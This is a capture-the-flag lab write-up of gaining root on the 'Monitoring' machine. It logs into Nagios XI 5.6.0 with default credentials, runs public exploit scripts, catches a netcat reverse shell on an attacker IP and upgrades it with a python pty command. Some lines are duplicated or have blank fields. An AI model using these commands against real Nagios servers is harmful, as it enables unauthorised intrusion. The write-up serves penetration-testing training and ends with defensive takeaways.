๐๏ธMonitoring
nmap -sV -sC -Pn -p- 192.168.121.136 --open
โ-sCโ โ simple scripts, โ-sVโ โ service version, โ-Pnโ โ skip host discovery, โ-p-โ โ all ports, and โ--openโ โ only the open ports are shown
Since there is a website open, will go to the website.
I proceeded to click โAccess Nagios XIโ and it brought me to a login page.
I looked up what the default credentials, which I found the username to be โnagiosadminโ and the password to be โadminโ. I tried these credentials, and it got worked.
Looking around on this website, I found that the website was Nagios XI 5.6.0.
I searched for an exploit for Nagios XI 5.6.0 and I came across several.
I searched for an exploit for Nagios XI 5.6.0 and I came across several.I downloaded this file and moved it to my current working directory. I then started a reverse shell listener on my local machine using the command nc -nvlp 4444.
searchsploit Nagios XI 5.6
searchsploit -m php/webapps/47299.php
nc -nvlp 4444
47299.php -t http://192.168.121.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh -lp 4444
Above payload not working will try another payload.
searchsploit -m linux/webapps/46221.py
Checked the syntax necessary for the script
python 46221.py
usage: 46221.py [-h] -t T -ip IP [-port PORT] -ncip NCIP [-ncport NCPORT]
python 46221.py -t http://192.168.121.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh -lp 4444
Will try to search in internet for the payload and found that below one we will try
https://www.exploit-db.com/exploits/52138
python3 exp.py -t https:/// -b // -u user -p 'password' -lh -lp -k (ignore cert)
python3 exploit_monitoring.py -t http://192.168.121.136/ -b /nagiosxi/ -u nagiosadmin -p admin -lh 192.168.45.212 -lp 4444 -k
now we have got the shell
we will use the below command to get the stable shell
which python- To identify the python version for the victim machine
python -c 'import pty;pty.spawn("/bin/bash")'
Next, we wanted to find the proof.txt flag so we could submit it in pg play. There is only one flag for this machine, โproof.txtโ, which I found the location of using the command
find / "proof.txt" 2>/dev/null | grep "proof.txt".
cat /root/proof.txt
Main Takeaway Concepts
DEFAULT CREDENTIALS
Default credentials are always something to attempt to log in with. It never hurts to look up what default credentials are for a CMS and trying to log in using those. Weak credentials (and default credentials) should always be changed since they are a major vulnerability. In this case, I was able to use default creds to log in to the website and then from there identify a further exploit.
ALWAYS LOOK UP VERSIONS
Checking versions of services and websites is an important part of finding out what can be exploited. After finding out what exact version that the service is running, it is important to look it up to see if it could be exploitable. In this case, after I was able to log in, I did a quick search and found that the website version was vulnerable. This led me to finding the exploit that worked and got me a root shell on the target machine.
Last updated
Was this helpful?